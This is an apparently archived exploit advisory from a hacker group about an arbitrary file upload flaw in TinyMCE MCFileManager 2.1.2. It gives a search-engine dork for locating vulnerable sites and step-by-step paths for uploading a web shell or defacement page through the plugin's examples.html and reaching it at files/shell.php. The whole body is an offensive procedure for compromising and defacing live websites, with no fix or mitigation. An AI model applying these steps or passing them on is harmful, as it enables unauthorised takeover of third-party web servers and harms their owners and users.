id: 14331
date: 10/04/2010
title: TinyMCE MCFileManager 2.1.2 Arbitrary File Upload Vulnerability
author: Hackeri-AL
cves: 

===============================================================
TinyMCE MCFileManager 2.1.2 Arbitrary File Upload Vulnerability
===============================================================


####################################################################
       
       Author         	: Hackeri-AL		 	                  
       Contact        	: h-al [at] hotmail [dot] it                         
       Greetz   	: LoocK3D & b4cKd00r ~ & GHoST61 & BaDBoy
       My Group         : UAH-Crew = United Albania Hackers

####################################################################

[~] DORK: inurl:/tiny_mce/plugins/filemanager/

--------------------------------------------------------------------

[~] You go to      : htpp://web.com/tiny_mce/plugins/filemanager/
[~] Redirect to    : htpp://web.com/tiny_mce/plugins/filemanager/examples.html <[ upload here shell or index.html ]
[~] Shell or index : htpp://web.com/tiny_mce/plugins/filemanager/files/shell.php or index.html

####################################################################

[~] Proud 2 be Albania
[~] Proud 2 be Muslim
[~] United States of Albania

####################################################################



#  0day.today [2023-03-26]  #